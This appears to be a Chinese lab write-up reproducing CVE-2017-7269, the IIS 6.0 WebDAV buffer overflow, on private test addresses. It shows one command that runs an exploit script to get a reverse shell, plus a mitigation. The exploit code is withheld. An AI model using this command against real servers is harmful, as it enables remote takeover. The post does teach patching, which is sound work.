IIS6.0 CVE-2017-7269 漏洞复现

2019-09-24 17:39:16 浏览数 (1)

在目前很多的攻防比赛中,IIS6.0仍然会出现,因此,我们再次再来和大家一起学习一波此漏洞的利用。

0X0 概述

Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC开始流传,但糟糕的是这产品已经停止更新了。

微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <http://”开头的长header PROPFIND请求,执行任意代码。该漏洞自2016年7、8月起就已被利用。

由于开启WebDAV服务就存在该漏洞,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

0X1:环境搭建:

Winodws Server2003,IIS开启写功能

物理机IP:192.168.1.2

靶 机 IP:172.16.1.17

0x2 漏洞利用

本地开启监听端口:

运行脚本攻击:

python iis6.0.py 172.16.1.17 80 192.168.1.24444

查看反弹:

攻击完成后,靶机的web服务就无法正常访问了!不过这个时候就已经完全控制系统了!

0X3 漏洞修复

关闭读写功能,禁止用户通过此功能写入。

发送:“IIS6.0“关键字”获取实验学习验证代码文件。

0 人点赞